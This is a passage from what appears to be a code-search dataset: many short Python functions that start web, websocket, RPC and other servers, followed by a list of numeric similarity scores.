reactor.callWhenRunning(self.OnStart)\n # And start reactor loop.\n reactor.run()", "def start():\n app.run()", "def main():\n print(\"Starting python server...\")\n\n # Set address to localhost\n address = \"tcp://127.0.0.1:\" + parse_port()\n\n # Start server with class API as \n server = zerorpc.Server(API.API())\n server.bind(address)\n\n print(\"Server started running on {}\".format(address))\n\n # Blocking command. Keeps server running\n server.run()", "def start(self, wait_for_stop=False):\n\n self.ua_server.start()\n if wait_for_stop:\n self.wait_for_stop()\n self.stop()", "def start(self) -> None:\n pass # for pydocstyle\n\n def serve() -> None:\n \"\"\"Serve forever.\"\"\"\n prefix = f\"In {ThreadedServer.__name__}.{serve.__name__}\"\n try:\n print(\n f\"{prefix}: Starting to serve {self.scenarios_dir} forever on: \"\n f\"http://localhost:{self.port}\",\n file=self.stdout,\n )\n\n self._httpd.serve_forever()\n\n print(f\"{prefix}: Stopped serving forever.\", file=self.stdout)\n\n except Exception as error:\n print(\n f\"{prefix}: Caught an exception in the HTTPD server \"\n f\"(it will be raised at shutdown): {error}\",\n file=self.stderr,\n )\n\n with self._server_exception_lock:\n self._server_exception = error\n\n self._work_thread = threading.Thread(target=serve)\n self._work_thread.start()", "async def server_main(loop, proxy_config, server_config):\n\n controller = Controller(\n MessageProxy(proxy_config),\n hostname=server_config['listen']['addr'],\n port=server_config['listen']['port'],\n )\n controller.start()", "async def start(self):", "async def start(self):", "def start() -> None:\n from app import app\n app.run(debug = True, host = HOST, port = PORT)", "def dev_start():\r\n nginx_reload()\r\n djangoserver_start()", "async def main():\r\n server_ip = '127.0.0.1'\r\n port = 8080\r\n logfile = open('loginlog.txt', 'w')\r\n logfile.close()\r\n server = await asyncio.start_server(\r\n handle_echo, server_ip, port)\r\n\r\n addr = server.sockets[0].getsockname()\r\n print(f'Serving on {addr}')\r\n\r\n async with server:\r\n await server.serve_forever()", "def start(self):\n loop = aio.get_event_loop()\n\n if self._with_subscribers:\n # Start the server to listen to events\n self.registry = SubscriptionRegistry()\n server = self.registry.server\n xx = aio.ensure_future(server)\n\n if self._with_discovery:\n # Start the server to listen to new devices\n addrinfo = socket.getaddrinfo(UPNP_ADDR, None)[0]\n sock = socket.socket(addrinfo[0], socket.SOCK_DGRAM)\n # Allow multiple copies of this program on one machine\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n listen = loop.create_datagram_endpoint(\n partial(UPnP,loop,UPNP_ADDR,self._found_device,self.upnp),\n sock=sock\n )\n xx = aio.ensure_future(listen)\n\n if self._with_discovery or self._with_subscribers:\n xx = aio.ensure_future(self.real_start())", "def start(self):\n\n self.app = Application()\n self.app._loop = self.loop\n self.add_routes()\n self.app.run(port=int(self.port),\n worker_num=None,\n reload=False,\n debug=False)\n # GZip support\n # Compress(self.app)\n # self.app.config['COMPRESS_MIMETYPES'] = {'text/html',\n # 'application/json'}\n # self.app.config['COMPRESS_LEVEL'] = 4\n # self.app.config['COMPRESS_MIN_SIZE'] = 300\n # Session support\n # self.session_interface = InMemorySessionInterface()\n # self.app.response_middleware.appendleft(self.save_session)\n # self.app.request_middleware.append(self.add_session_to_request)\n\n # self.add_routes()\n # return await 
self.app.create_server(loop=self.loop,\n # host='0.0.0.0',\n # port=self.port,\n # debug=False)", "async def main():\n await serve_websocket(handle_server, SERVER, PORT, ssl_context=None)", "def run(self):\r\n self.rpc_server.serve_forever(0.5)", "def run_simple_server(tb_app):\n # Mute the werkzeug logging.\n base_logging.getLogger('werkzeug').setLevel(base_logging.WARNING)\n\n try:\n server = serving.make_server(FLAGS.host, FLAGS.port, tb_app, threaded=True)\n server.daemon_threads = True\n except socket.error:\n if FLAGS.port == 0:\n msg = 'TensorBoard unable to find any open port'\n else:\n msg = (\n 'TensorBoard attempted to bind to port %d, but it was already in use'\n % FLAGS.port)\n logging.error(msg)\n print(msg)\n exit(-1)\n\n port = server.socket.getsockname()[1]\n msg = 'Starting TensorBoard %s at http://%s:%d' % (tb_app.tag, FLAGS.host,\n port)\n print(msg)\n logging.info(msg)\n print('(Press CTRL+C to quit)')\n sys.stdout.flush()\n\n server.serve_forever()", "def start_server():\n server = WebsocketServer(9001, host='0.0.0.0')\n server.set_fn_message_received(message_received)\n server.set_fn_client_left(client_left)\n print(\"Started\")\n server.run_forever()", "def start_server(self):\n self.logger.info(\"Starting WebSocket server on port %d\" % self.port)\n http_server = Thread(target=tornado.ioloop.IOLoop.instance().start)\n http_server.start()", "async def start(self) -> None:\n\n self._mode_supported = None\n self._hsm_supported = None\n\n try:\n await self._start_server()\n await self.load_devices()\n _LOGGER.debug(\"Connected to Hubitat hub at %s\", self.host)\n except aiohttp.ClientError as e:\n raise ConnectionError(str(e))\n\n try:\n await self._load_modes()\n self._mode_supported = True\n except Exception as e:\n self._mode_supported = False\n _LOGGER.warning(f\"Unable to access modes: {e}\")\n\n try:\n await self._load_hsm_status()\n self._hsm_supported = True\n except Exception as e:\n self._hsm_supported = False\n _LOGGER.warning(f\"Unable to access HSM status: {e}\")", "def run():\r\n log.debug('Starter::run()')\r\n try:\r\n # check specified port\r\n if not conf.port:\r\n raise Exception(\"Please specify port number! (use --port)\")\r\n Server(conf.port).run()\r\n except Exception as E:\r\n log.critical(E)", "def test_starts_http_api_server(self):\n options = ControlOptions()\n options.parseOptions(\n [b\"--port\", b\"tcp:8001\", b\"--data-path\", self.mktemp()])\n reactor = MemoryCoreReactor()\n ControlScript().main(reactor, options)\n server = reactor.tcpServers[0]\n port = server[0]\n factory = server[1].__class__\n self.assertEqual((port, factory), (8001, Site))", "def main() -> None:\n runner()\n asyncio.get_event_loop().run_forever()", "def main() -> None:\n runner()\n asyncio.get_event_loop().run_forever()", "def start(self, name=None):\n server = self.cloudman.get_server(name)['id']\n r = self.cloudman.compute.start_server(server)\n return r", "async def _start_server(self) -> None:\n # First, figure out what address to listen on. Open a connection to\n # the Hubitat hub and see what address it used. 
This assumes this\n # machine and the Hubitat hub are on the same network.\n with _open_socket(socket.AF_INET, socket.SOCK_DGRAM) as s:\n s.connect((self.host, 80))\n address = s.getsockname()[0]\n\n self._server = server.create_server(\n self._process_event, address, self.port or 0, self.ssl_context\n )\n self._server.start()\n _LOGGER.debug(\n \"Listening on %s:%d with SSL %s\",\n address,\n self._server.port,\n \"disabled\" if self.ssl_context is None else \"enabled\",\n )\n\n await self.set_event_url(self.event_url)", "def startFluidinfo():\n sudo('start fluidinfo-api')\n sudo('/etc/init.d/haproxy start')\n sudo('/etc/init.d/nginx start')", "def start(**kwargs):\n # Project\n\n CustomWSGI(\n app=\"stats.api.main:api\",\n options={\n \"worker_class\": \"uvicorn.workers.UvicornWorker\",\n \"preload\": True,\n \"keepalive\": 10,\n \"command\": shutil.which(\"gunicorn\"),\n \"bind\": \":\".join(\n (format_listen_address(params.listen_address), str(params.listen_port))\n ),\n \"workers\": workers,\n \"loglevel\": loglevel,\n \"accesslog\": \"-\",\n \"errorlog\": \"-\",\n # \"logconfig_dict\": {\"formatters\": {\"generic\": {\"format\": \"%(message)s\"}}},\n **kwargs,\n },\n ).run()", "def start_server(self):\n if self.esp_mgr.ap:\n self.server_socket = adafruit_esp32spi_socket.socket()\n self.esp_mgr.esp.start_server(23, self.server_socket.socknum)", "def start(self) -> None:\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n self.wserver = websockets.serve(self.__producer_handler, port=self.port, loop=loop)\n try:\n # run server forever\n self.server = asyncio.get_event_loop()\n self.server.run_until_complete(self.wserver)\n self.server.run_forever()\n except Exception:\n self.close()\n\n loop.run_forever()", "def main():\r\n LOG.info('Starting server build.')\r\n web.run_app(init_app(),\r\n host=os.environ.get('APP_HOST', CONFIG.registry.get('app_host', '0.0.0.0')),\r\n port=int(os.environ.get('APP_PORT', CONFIG.registry.get('app_port', 8080))),\r\n shutdown_timeout=0,\r\n ssl_context=application_security())", "def _StartServer( self ):\n with self._gocode_lock:\n _logger.info( 'Starting Gocode server' )\n\n self._gocode_port = utils.GetUnusedLocalhostPort()\n self._gocode_host = '127.0.0.1:{0}'.format( self._gocode_port )\n\n command = [ self._gocode_binary_path,\n '-s',\n '-sock', 'tcp',\n '-addr', self._gocode_host ]\n\n if _logger.isEnabledFor( logging.DEBUG ):\n command.append( '-debug' )\n\n self._gocode_stdout = utils.CreateLogfile(\n LOGFILE_FORMAT.format( port = self._gocode_port, std = 'stdout' ) )\n self._gocode_stderr = utils.CreateLogfile(\n LOGFILE_FORMAT.format( port = self._gocode_port, std = 'stderr' ) )\n\n with utils.OpenForStdHandle( self._gocode_stdout ) as stdout:\n with utils.OpenForStdHandle( self._gocode_stderr ) as stderr:\n self._gocode_handle = utils.SafePopen( command,\n stdout = stdout,\n stderr = stderr )", "def start(verbose=False):\n\n _prepare_execution(verbose)\n _validate_components_prepared('start')\n logger.notice('Starting Cloudify Manager services...')\n for component in components:\n if not component.skip_installation:\n component.start()\n logger.notice('Cloudify Manager services successfully started!')\n _print_time()", "def start_server():\n server.bind(constants.ADDRESS)\n server.listen()\n print(\"Server listening on: \" + constants.HOST + \" on port \" + str(constants.PORT) + \"...\")", "def run_server():\n app = init_app()\n app.run(host=app.config['HOST'], port=app.config['PORT'])", "def _run(self) -> None:\n 
asyncio.set_event_loop(self._server_loop)\n self._server_loop.run_until_complete(self._runner.setup())\n\n site = web.TCPSite(\n self._runner, self.host, self.port, ssl_context=self.ssl_context\n )\n self._server_loop.run_until_complete(site.start())\n\n # If the Server was initialized with port 0, determine what port the\n # underlying server ended up listening on\n if self.port == 0:\n site_server = cast(AsyncioServer, site._server)\n sockets = cast(List[Socket], site_server.sockets)\n socket = sockets[0]\n self.port = socket.getsockname()[1]\n\n self._startup_event.set()\n self._server_loop.run_forever()", "async def serve_web(self):\n interface = \"0.0.0.0\" if settings.PUBLIC_ACCESS else \"127.0.0.1\"\n port = settings.WEB_PORT\n self.logger.info(f\"web: starting the server on {interface}:{port}...\")\n await self.runner.setup()\n site = aioweb.TCPSite(self.runner, interface, port)\n await site.start()\n self.preparing_task = None", "def run(self):\n server = TCPServer((self.host, self.port), TCPHandler)\n server.lymphocytes_getter = self.lymphocytes_getter\n\n #runs forever - so make this thread daemon\n server.serve_forever()", "def _start_server_process():\n from gevent import monkey\n monkey.patch_all()\n\n from tellapart.frontend import gevent_profiler\n from tellapart.frontend import util\n\n # In this example, profile 100% of requests.\n # In a production server, you'd typically profile far fewer.\n\n if USE_PYWSGI:\n profiler = gevent_profiler.Profiler(\n request_profiling_pct=1.0,\n request_info_class=gevent_profiler.PyWsgiServerRequestInfo)\n\n util.launch_gevent_wsgi_server(_do_stuff, 8088, 16, 'example server',\n use_pywsgi=True)\n else:\n profiler = gevent_profiler.Profiler(request_profiling_pct=1.0)\n util.launch_gevent_wsgi_server(_do_stuff, 8088, 16, 'example server')", "def start(self):\n self.watcher.start()\n self._asyncio_loop.run_forever()", "async def run_sever_async(host: str = \"0.0.0.0\", port: int = 8000):\n runner = web.AppRunner(app_factory())\n site = web.TCPSite(runner, host, port)\n print(f\"guix-python-app: Runing server on {host}:{port}\")\n print(f\">> try: curl http://{host}:{port}/ping\")\n await site.start()", "def start(self):\n assert(self._cbs is not None)\n self._as.start() # start the server", "def start_server(**params):\n\n def _grpc_server_async(options):\n call_command(\"grpcserver\", **options)\n\n port = 50000 + randint(0, 10000)\n params[\"port\"] = port\n # Start grpc server\n srv = threading.Thread(\n target=_grpc_server_async, args=[params]\n )\n srv.start()\n sleep(5)\n return \"localhost:%s\" % port", "def local_webserver_start():\n if not _is_webserver_running():\n local(_webserver_command())", "def handle(host: str = \"0.0.0.0\", port: int = 8080, reload: bool = True):\n host = fnc.get(\"server.host\", config, default=host)\n port = fnc.get(\"server.port\", config, default=port)\n reload = fnc.get(\"server.reload\", config, default=reload)\n\n if fnc.get(\"server.custom\", config):\n uvicorn.run(fnc.get(\"server.module\", config,\n default=\"server:app\"), host=host, port=port, reload=reload)\n else:\n uvicorn.run(\"nork.framework.server:app\",\n host=host, port=port, reload=reload)", "async def start(self):\n envs = self.user_env()\n self.remote_host = await self.start_ec2_instance(envs)\n \n # commenting this out till I have added aws networking within a subnet\n # port = await self.remote_random_port()\n port=int(os.getenv('REMOTE_PORT'))\n if port is None or port == 0:\n return False\n cmd = []\n\n cmd.extend(self.cmd)\n 
cmd.extend(self.get_args())\n\n if self.hub_api_url != \"\":\n old = \"--hub-api-url={}\".format(self.hub.api_url)\n new = \"--hub-api-url={}\".format(self.hub_api_url)\n for index, value in enumerate(cmd):\n if value == old:\n cmd[index] = new\n for index, value in enumerate(cmd):\n if value[0:6] == '--port':\n cmd[index] = '--port=%d' % (port)\n\n remote_cmd = ' '.join(cmd)\n\n remote_cmd = '/usr/local/bin/'+remote_cmd\n\n self.log.debug(\"Command issued to remote serve: {}\".format(remote_cmd))\n self.pid = await self.exec_notebook(remote_cmd)\n\n self.log.debug(\"Starting User: {}, PID: {}\".format(self.user.name, self.pid))\n\n if self.pid < 0:\n return None\n # DEPRECATION: Spawner.start should return a url or (ip, port) tuple in JupyterHub >= 0.9\n return (self.remote_host, int(port))", "def start(setup): #pragma: no cover\n import warnings\n warnings.warn(\"start() is deprecated, use run() instread\", DeprecationWarning)\n\n\n async def main():\n await setup()\n await initialize()\n try:\n tasks = []\n for hub in Hub.hubs:\n tasks.append(spawn(hub.run()))\n for task in tasks:\n await task\n finally:\n await finalize()\n loop = get_event_loop()\n loop.run_until_complete(main(program))", "def main():\n lgs = LifeGenServer()\n lgs.listening()", "def runserver():\n\tapp.run(host = '0.0.0.0', port = 5000)", "def start(verbose=False):\n\n _load_config_and_logger(verbose)\n _validate_manager_installed('start')\n logger.notice('Starting Cloudify Manager services...')\n for component in COMPONENTS:\n if hasattr(component, 'start'):\n component.start()\n logger.notice('Cloudify Manager services successfully started!')\n _print_time()", "def start(parse_opts):\n global opts\n opts = parse_opts\n app.run(host='0.0.0.0')", "def run(self):\n # Get the UUID so we can heartbeat to Ironic. Raises LookupNodeError\n # if there is an issue (uncaught, restart agent)\n self.started_at = _time()\n\n # Cached hw managers at runtime, not load time. 
See bug 1490008.\n hardware.load_managers()\n\n if not self.standalone:\n # Inspection should be started before call to lookup, otherwise\n # lookup will fail due to unknown MAC.\n uuid = inspector.inspect()\n\n content = self.api_client.lookup_node(\n hardware_info=hardware.dispatch_to_managers(\n 'list_hardware_info'),\n timeout=self.lookup_timeout,\n starting_interval=self.lookup_interval,\n node_uuid=uuid)\n\n self.node = content['node']\n self.heartbeat_timeout = content['heartbeat_timeout']\n\n wsgi = simple_server.make_server(\n self.listen_address[0],\n self.listen_address[1],\n self.api,\n server_class=simple_server.WSGIServer)\n\n if not self.standalone:\n # Don't start heartbeating until the server is listening\n self.heartbeater.start()\n\n try:\n wsgi.serve_forever()\n except BaseException:\n self.log.exception('shutting down')\n\n if not self.standalone:\n self.heartbeater.stop()", "def main():\n cfg.CONF(sys.argv[1:], project='blazar', prog='blazar-api')\n notifier.init()\n service_utils.prepare_service(sys.argv)\n if not CONF.enable_v1_api:\n app = v2_app.make_app()\n else:\n app = wsgi_app.VersionSelectorApplication()\n\n wsgi.server(eventlet.listen((CONF.host, CONF.port), backlog=500), app)", "def start():\n trio.run(_main)", "def run(self):\n run_simple(self.hostname, self.port, self.dispatch,\n use_reloader=self.debug)", "def start(self):\n super(EngineService, self).start()\n\n self.target = oslo_messaging.Target(server=self.service_id,\n topic=self.topic,\n version=self.version)\n\n self.server = messaging.get_rpc_server(self.target, self)\n self.server.start()", "def start_server(self):\n if not self._server:", "def start(self) -> None:\n if self.bolt_app.logger.level > logging.INFO:\n print(get_boot_message())\n else:\n self.bolt_app.logger.info(get_boot_message())\n\n web.run_app(self.web_app, host=\"0.0.0.0\", port=self.port)", "def start(self, logfile_name):\n\n self._verify_not_running()\n\n # The package structure for LiteServ is different pre 1.4. Handle for this case\n if has_dot_net4_dot_5(self.version_build):\n binary_path = \"{}/couchbase-lite-net-mono-{}-liteserv/net45/LiteServ.exe\".format(BINARY_DIR, self.version_build)\n else:\n binary_path = \"{}/couchbase-lite-net-mono-{}-liteserv/LiteServ.exe\".format(BINARY_DIR, self.version_build)\n\n process_args = [\n \"mono\",\n binary_path,\n \"--port\", str(self.port),\n \"--dir\", \"{}/dbs/net-mono/\".format(RESULTS_DIR)\n ]\n\n if self.storage_engine == \"ForestDB\" or self.storage_engine == \"ForestDB+Encryption\":\n process_args.append(\"--storage\")\n process_args.append(\"ForestDB\")\n else:\n process_args.append(\"--storage\")\n process_args.append(\"SQLite\")\n\n if self.storage_engine == \"SQLCipher\" or self.storage_engine == \"ForestDB+Encryption\":\n log_info(\"Using Encryption ...\")\n db_flags = []\n for db_name in REGISTERED_CLIENT_DBS:\n db_flags.append(\"--dbpassword\")\n db_flags.append(\"{}=pass\".format(db_name))\n process_args.extend(db_flags)\n\n log_info(\"Launching: {} with args: {}\".format(binary_path, process_args))\n\n self.logfile = open(logfile_name, \"w\")\n self.process = subprocess.Popen(args=process_args, stdout=self.logfile)\n\n self._verify_launched()\n\n return \"http://{}:{}\".format(self.host, self.port)", "async def startup(self):", "async def startup(self):", "def server():", "def server():", "def run_forever(self):\n self.app.run()" ]
[ "0.7084234", "0.6992241", "0.69815814", "0.6813422", "0.68041515", "0.6786285", "0.6786285", "0.6771331", "0.6730415", "0.669539", "0.6544975", "0.648505", "0.6399624", "0.63707113", "0.6362181", "0.63410026", "0.6337383", "0.6334539", "0.63275516", "0.63197315", "0.62906486", "0.6289428", "0.62887746", "0.6277157", "0.6223457", "0.61977243", "0.6194843", "0.6194075", "0.6179964", "0.6155654", "0.6151399", "0.6146561", "0.6136541", "0.61043555", "0.6088479", "0.6077522", "0.60752773", "0.60691214", "0.6051083", "0.60339296", "0.60083526", "0.6006535", "0.59996617", "0.59658784", "0.59658784", "0.59626335", "0.5947256", "0.5944621", "0.5930474", "0.59259087", "0.5922499", "0.5920323", "0.59071136", "0.59034455", "0.5884926", "0.5872637", "0.58724785", "0.5864107", "0.58625275", "0.58625275", "0.5841258", "0.5837941", "0.5837612", "0.58259463", "0.5817344", "0.58131903", "0.5811351", "0.5811329", "0.5808302", "0.5806056", "0.5799422", "0.5794119", "0.57938236", "0.578987", "0.57871866", "0.5777063", "0.57729244", "0.57708067", "0.57686687", "0.5767645", "0.57376945", "0.5734242", "0.57328725", "0.57314193", "0.57253855", "0.57227004", "0.5721925", "0.5714934", "0.570417", "0.5702657", "0.56942075", "0.5693917", "0.569107", "0.5684045", "0.56800246", "0.5669114", "0.5669114", "0.566263", "0.566263", "0.56625974" ]
0.6218118
25
Collation function to be used with data loaders
def collate(self, batch):
    images = []
    indices = []
    roi_size = 5 if self.Train else 4
    rois = torch.zeros((len(batch), 20, roi_size), dtype=torch.float32)
    rois = rois.to(batch[0][1].device)
    for _b in range(len(batch)):
        # Accumulate patches:
        images.append(batch[_b][0].to(torch.float32))
        indices.append(batch[_b][2])
        # Accumulate ROI:
        """
        image_num = torch.Tensor([_b]).expand(batch[_b][1].size(0))
        image_num = image_num.type(batch[_b][1].dtype).view(-1,1)
        image_num = image_num.to(batch[_b][1].device)
        _roi = torch.cat([image_num, batch[_b][1]], dim=1)
        rois = torch.cat([rois, _roi], dim=0)
        """
        num_boxes = batch[_b][1].size(0)
        rois[_b,:num_boxes,:] = batch[_b][1]
    # Stack outputs and return
    batch = [torch.stack(images, dim=0), rois, torch.Tensor(indices)]
    return batch
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def collation(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"collation\")", "def collation(self) -> str:\n return pulumi.get(self, \"collation\")", "def collation(self) -> str:\n return pulumi.get(self, \"collation\")", "def collation(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"collation\")", "def collation(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"collation\")", "def test_collation_register_twice(self):\n con = sqlite.connect(\":memory:\")\n con.create_collation(\"mycoll\", lambda x, y: (x > y) - (x < y))\n con.create_collation(\"mycoll\", lambda x, y: -((x > y) - (x < y)))\n result = con.execute(\"\"\"\n select x from (select 'a' as x union select 'b' as x) order by x collate mycoll\n \"\"\").fetchall()\n self.assertEqual(result[0][0], 'b')\n self.assertEqual(result[1][0], 'a')", "def collation(self) -> Optional[str]:\n return pulumi.get(self, \"collation\")", "def db_collations_choices(self):\n # To avoid pre-mature initialization of db-context.\n from django.db import connection\n\n with connection.cursor() as cursor:\n cursor.execute(\"SELECT collname, collcollate FROM pg_collation\")\n rows = cursor.fetchall()\n return ((name, \"{} ({})\".format(name, collate)) for name, collate in rows)", "def no_collation(x):\n return x", "def get_collation(self, col_id):\n for cs in self.charset_map:\n if int(col_id) == int(cs[ID]):\n return cs[COLLATION_NAME]\n return None", "def _init_collate(self, cfg: ConfigType) -> Callable:\n try:\n with FUNCTIONS.switch_scope_and_registry(self.scope) as registry:\n collate_fn = registry.get(cfg.test_dataloader.collate_fn)\n except AttributeError:\n collate_fn = pseudo_collate\n return collate_fn # type: ignore", "def catalog_collation(self) -> Optional[str]:\n return pulumi.get(self, \"catalog_collation\")", "def test_deregister_collation(self):\n con = sqlite.connect(\":memory:\")\n con.create_collation(\"mycoll\", lambda x, y: (x > y) - (x < y))\n con.create_collation(\"mycoll\", None)\n with self.assertRaises(sqlite.OperationalError) as cm:\n con.execute(\"select 'a' as x union select 'b' as x order by x collate mycoll\")\n self.assertEqual(str(cm.exception), 'no such collation sequence: mycoll')", "def collate_fn(data):\n # Sort by conversation length (descending order) to use 'pack_padded_sequence'\n data.sort(key=lambda x: x[1], reverse=True)\n\n # Separate\n sentences, conversation_length, sentence_length = zip(*data)\n\n # return sentences, conversation_length, sentence_length.tolist()\n return sentences, conversation_length, sentence_length", "def collate_fn(self, *args):\n return TupleMiniBatch(default_collate(*args))", "def use_locale(self, collation):\n loc = locale.getlocale(locale.LC_COLLATE)\n if collation == UNICODE_CODEPOINT_COLLATION:\n collation = 'en_US.UTF-8'\n\n try:\n locale.setlocale(locale.LC_COLLATE, collation)\n except locale.Error:\n raise self.error('FOCH0002', 'Unsupported collation %r' % collation)\n else:\n yield\n finally:\n locale.setlocale(locale.LC_COLLATE, loc)", "def get_default_collation(self, col_id):\n # Exception for utf8\n if col_id == 83:\n return \"utf8_bin\"\n for cs in self.charset_map:\n if int(cs[ID]) == int(col_id) and cs[IS_DEFAULT].upper() == \"YES\":\n return cs[COLLATION_NAME]\n return None", "def get_collations(self):\n collations = self.query(sql.all_collation)\n collation_charsets = {}\n for r in collations:\n collation_charsets[r[\"COLLATION_NAME\"]] = r[\"CHARACTER_SET_NAME\"]\n return collation_charsets", "def default_collation(self) -> 
str:\n return pulumi.get(self, \"default_collation\")", "def sort_by_unicode(self):\n utils.sort_unicode_word_list(self.words_new)", "def get_collation(self, collation_hash):\n try:\n collation_rlp = self.db.get(collation_hash)\n if collation_rlp == 'GENESIS':\n return Collation(CollationHeader())\n # if not hasattr(self, 'genesis'):\n # self.genesis = rlp.decode(self.db.get('GENESIS_RLP'), sedes=Block)\n # return self.genesis\n else:\n return rlp.decode(collation_rlp, Collation)\n except Exception as e:\n log.debug(\"Failed to get collation\", hash=encode_hex(collation_hash), error=str(e))\n return None", "def fn_s(fn):\r\n c.execute(\"SELECT * FROM personnel WHERE first=:first COLLATE NOCASE\", {'first': fn})\r\n return c.fetchall()", "def collate_fn(self, image_column_names: Optional[List] = None, per_gpu_batch_size: Optional[int] = None) -> Dict:\n fn = {}\n if self.requires_column_info:\n return NotImplementedError(\n f\"requires_column_info={self.requires_column_info} not implemented for OVD tasks.\"\n )\n\n fn.update(\n {\n self.image_key: PadCollator(pad_val=0),\n self.prompt_key: ListCollator(),\n self.image_meta_key: ListCollator(),\n }\n )\n return fn", "def collate_fn(batch):\n pad_index = 1 # the <PAD> index in vocabulary\n src_list = [sample[0] for sample in batch] # list of each language sentences\n trg_list = [sample[1] for sample in batch]\n\n def padding(sentence_list):\n \"\"\"padding each sentence to the right\"\"\"\n max_len = max([sentence.size(0) for sentence in sentence_list])\n pad_sen = [sen.tolist() + [pad_index] * max(0, max_len - len(sen))\n for sen in sentence_list]\n return torch.LongTensor(pad_sen).transpose(0, 1) # shape of (T, B)\n\n return padding(src_list), padding(trg_list)", "def get_collate_for_dataset(\n dataset: Union[Dataset, ConcatDataset], ensure_collate_fn_are_the_same: bool = True\n) -> Callable:\n collate_fn = default_collate\n\n if hasattr(dataset, \"get_collate_fn\"):\n return dataset.get_collate_fn()\n elif isinstance(dataset, ConcatDataset):\n collate_fns = [get_collate_for_dataset(ds) for ds in dataset.datasets]\n collate_fn = collate_fns[0]\n\n if ensure_collate_fn_are_the_same:\n for other_collate_fn in collate_fns[1:]:\n if type(other_collate_fn) != type(collate_fn):\n raise ValueError(\n f\"Detected ConcatDataset consist of datasets with different collate functions: {type(collate_fn)} and {type(other_collate_fn)}.\"\n )\n\n if isinstance(collate_fn, functools.partial):\n if not _partial_functions_equal(collate_fn, other_collate_fn):\n raise ValueError(\n f\"Detected ConcatDataset consist of datasets with different collate functions: {collate_fn} and {type(other_collate_fn)}.\"\n )\n elif collate_fn != other_collate_fn:\n raise ValueError(\n f\"Detected ConcatDataset consist of datasets with different collate functions: {collate_fn} and {other_collate_fn}.\"\n )\n\n collate_fn = collate_fns[0]\n\n return collate_fn", "def sortCaseInsensitive(*args, **kwargs)->List[AnyStr]:\n pass", "def custom_collate_fn(data):\n features, labels = zip(*data)\n return pack_sequence(features, enforce_sorted=False), torch.tensor(labels)", "def completer_func_cols(text, state):\n return [x for x in lc_keys if x.startswith(text)][state]", "def prepare(self):\n\n for i in range(len(self.__corpora)):\n string = self.__corpora[i]\n string = sub(r'[\\n\\t]| {2,}', ' ', string.lower())\n string = sub(r'[^{0}]'.format(self.alphabet + ' '), '', string)\n\n if self.lang == 'uk':\n string = sub(r'[ґ]', 'г', string)\n\n elif self.lang == 'ru':\n string = sub(r'[ё]', 
'е', string)\n\n self.__corpora[i] = string", "def get_collate_fn(mixer_name: str, alpha: float) -> Callable:\n fn = cutmix if mixer_name == \"cutmix\" else mixup\n collate_fn = CustomCollate(alpha=alpha, mixer=fn)\n return collate_fn", "def russian_to_en(df_data):\n tranlate_file = {'region': 'russian_region_names_in_english.csv',\n 'city': 'russian_city_names_in_english.csv',\n 'parent_category_name': 'parent_product_categories.csv',\n 'category_name': 'product_categories.csv',\n 'param_1': 'param_1.csv',\n 'param_2': 'param_2.csv',\n 'param_3': 'param_3.csv'}\n \n # Iterate over input dataframe columns,\n # Use files from: www.kaggle.com/kaparna/translations/data, if possible.\n # For 'description' column, use translate module.\n for col in df_data.columns:\n file = tranlate_file.get(col, None) \n if file: \n # build up the mapping from Russian to English.\n file = pandas.read_csv(PATH+file)\n file.columns = ['rus', 'en']\n convert = {row['rus']: row['en'] for index, row in file.iterrows()}\n \n # translate column into English\n df_data[col] = df_data[col].map(convert, na_action='ignore')", "def get_name_by_collation(self, colname):\n for cs in self.charset_map:\n if cs[COLLATION_NAME] == colname:\n return cs[CHARACTER_SET_NAME]\n return None", "def find_abecedarian_words():\n pass", "def retranslate(self):\r\n pass", "def retranslate(self):\r\n pass", "def collate_fn(data):\n # Sort a data list by caption length\n images, captions, cap_mask, vision_mask, labels, vision_labels = zip(*data)\n\n images = torch.stack(images, 0)\n labels = torch.stack(labels, 0)\n vision_labels = torch.stack(vision_labels, 0).long()\n targets = torch.stack(captions, 0).long()\n cap_mask = torch.stack(cap_mask,0).long()\n vision_mask = torch.stack(vision_mask,0).long()\n\n return images, targets, cap_mask, vision_mask, labels, vision_labels", "def collate_fn(batch):\r\n names, images, annos = zip(*batch)\r\n images = default_collate(images)\r\n return names, images, annos", "def collate_fn(batch):\r\n names, images, annos = zip(*batch)\r\n images = default_collate(images)\r\n return names, images, annos", "def correctWord (w):\r\n if len(re.findall(r\"[а-я]\",w))>len(re.findall(r\"[a-z]\",w)):\r\n return w.translate(eng_rusTranslateTable)\r\n else:\r\n return w.translate(rus_engTranslateTable)", "def __init__(self, encoding):\n self.trans = {}\n for char in u\"ÀÁÂẦẤẪẨẬÃĀĂẰẮẴẶẲȦǠẠḀȂĄǍẢ\":\n self.trans[char] = u\"A\"\n for char in u\"ȀǞ\":\n self.trans[char] = u\"Ä\"\n self.trans[u\"Ǻ\"] = u\"Å\"\n self.trans[u\"Ä\"] = u\"Ae\"\n self.trans[u\"Å\"] = u\"Aa\"\n for char in u\"àáâầấẫẩậãāăằắẵặẳȧǡạḁȃąǎảẚ\":\n self.trans[char] = u\"a\"\n for char in u\"ȁǟ\":\n self.trans[char] = u\"ä\"\n self.trans[u\"ǻ\"] = u\"å\"\n self.trans[u\"ä\"] = u\"ae\"\n self.trans[u\"å\"] = u\"aa\"\n for char in u\"ḂḄḆƁƂ\":\n self.trans[char] = u\"B\"\n for char in u\"ḃḅḇƀɓƃ\":\n self.trans[char] = u\"b\"\n for char in u\"ĆĈĊÇČƇ\":\n self.trans[char] = u\"C\"\n for char in u\"ćĉċçčƈȼ\":\n self.trans[char] = u\"c\"\n self.trans[u\"Ḉ\"] = u\"Ç\"\n self.trans[u\"ḉ\"] = u\"ç\"\n self.trans[u\"Ð\"] = u\"Dh\"\n self.trans[u\"ð\"] = u\"dh\"\n for char in u\"ĎḊḌḎḐḒĐƉƊƋ\":\n self.trans[char] = u\"D\"\n for char in u\"ďḋḍḏḑḓđɖɗƌ\":\n self.trans[char] = u\"d\"\n for char in u\"ÈȄÉÊḚËĒḔḖĔĖẸE̩ȆȨḜĘĚẼḘẺ\":\n self.trans[char] = u\"E\"\n for char in u\"ỀẾỄỆỂ\":\n self.trans[char] = u\"Ê\"\n for char in u\"èȅéêḛëēḕḗĕėẹe̩ȇȩḝęěẽḙẻ\":\n 